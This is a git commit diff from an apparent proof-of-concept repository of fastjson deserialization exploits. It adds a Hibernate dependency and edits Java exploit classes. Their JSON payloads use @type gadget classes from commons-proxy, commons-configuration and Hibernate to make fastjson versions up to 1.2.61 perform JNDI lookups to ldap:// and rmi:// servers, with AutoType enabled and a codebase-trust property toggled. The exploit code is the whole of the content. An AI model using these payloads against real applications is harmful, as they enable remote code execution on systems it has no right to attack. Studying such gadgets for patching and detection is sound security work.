fix:CommonsProxyPoc

xuanyh · xuanyh · commit d2e91b7dc71f · 2020-01-08T20:34:38.000+08:00
diff --git a/pom.xml b/pom.xml
@@ -158,6 +158,31 @@
       <artifactId>commons-proxy</artifactId>
       <version>1.0</version>
     </dependency>
+
+    <!-- hibernate -->
+    <dependency>
+      <groupId>org.hibernate</groupId>
+      <artifactId>hibernate</artifactId>
+      <version>3.2.1.ga</version>
+      <exclusions>
+        <exclusion>
+          <groupId>javax.transaction</groupId>
+          <artifactId>jta</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>asm</groupId>
+          <artifactId>asm</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>asm</groupId>
+          <artifactId>asm-attrs</artifactId>
+        </exclusion>
+        <exclusion>
+          <groupId>cglib</groupId>
+          <artifactId>cglib</artifactId>
+        </exclusion>
+      </exclusions>
+    </dependency>
   </dependencies>
 
   <build>
diff --git a/src/main/java/com/threedr3am/bug/fastjson/CommonsProxyPoc.java b/src/main/java/com/threedr3am/bug/fastjson/CommonsProxyPoc.java
@@ -3,7 +3,9 @@
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.parser.ParserConfig;
 import com.threedr3am.bug.server.LdapServer;
+import com.threedr3am.bug.server.RmiServer;
 import java.util.Collection;
+import org.apache.commons.proxy.provider.remoting.RmiProvider;
 
 /**
  * fastjson <= 1.2.61 RCE，需要开启AutoType
@@ -22,18 +24,20 @@ public class CommonsProxyPoc {
 
   public static void main(String[] args) {
     //TODO 使用rmi server模式时，jdk版本高的需要开启URLCodebase trust
-    System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
-
+//    System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
 
     ParserConfig.global.setAutoTypeSupport(true);
 
 //    String payload = "{\"@type\":\"org.apache.commons.proxy.provider.remoting.SessionBeanProvider\",\"jndiName\":\"rmi://localhost:43657/Calc\"}";
     String payload = "{\"@type\":\"org.apache.commons.proxy.provider.remoting.SessionBeanProvider\",\"jndiName\":\"ldap://localhost:43658/Calc\",\"Object\":\"a\"}";
+
     try {
-      JSON.parse(payload);
+      JSON.parseObject(payload);
     } catch (Exception e) {
       e.printStackTrace();
     }
-    JSON.parse(payload);
+
+
+    JSON.parseObject(payload);
   }
 }
diff --git a/src/main/java/com/threedr3am/bug/fastjson/TestPoc.java b/src/main/java/com/threedr3am/bug/fastjson/TestPoc.java
@@ -24,7 +24,7 @@ public static void main(String[] args) {
     ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
 
 //    String payload = "{\"@\\u0074ype\":\"org.apache.commons.configuration.JNDIConfiguration\",\"jndiLocation\":\"ldap://localhost:43658/Calc\"}";//ldap方式
-    String payload = "{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"jndiLocation\":\"ldap://localhost:43658/Calc\"}";//ldap方式
+    String payload = "{\"@type\":\"org.hibernate.jmx.StatisticsService\",\"sessionFactoryJNDIName\":\"ldap://localhost:43658/Calc\"}";//ldap方式
     JSON.parse(payload);
   }
 }

Original file line number	Diff line number	Diff line change
`@@ -24,7 +24,7 @@ public static void main(String[] args) {`
`24`	`24`	`ParserConfig.getGlobalInstance().setAutoTypeSupport(true);`
`25`	`25`
`26`	`26`	`// String payload = "{\"@\\u0074ype\":\"org.apache.commons.configuration.JNDIConfiguration\",\"jndiLocation\":\"ldap://localhost:43658/Calc\"}";//ldap方式`
`27`		`- String payload = "{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"jndiLocation\":\"ldap://localhost:43658/Calc\"}";//ldap方式`
	`27`	`+ String payload = "{\"@type\":\"org.hibernate.jmx.StatisticsService\",\"sessionFactoryJNDIName\":\"ldap://localhost:43658/Calc\"}";//ldap方式`
`28`	`28`	`JSON.parse(payload);`
`29`	`29`	`}`
`30`	`30`	`}`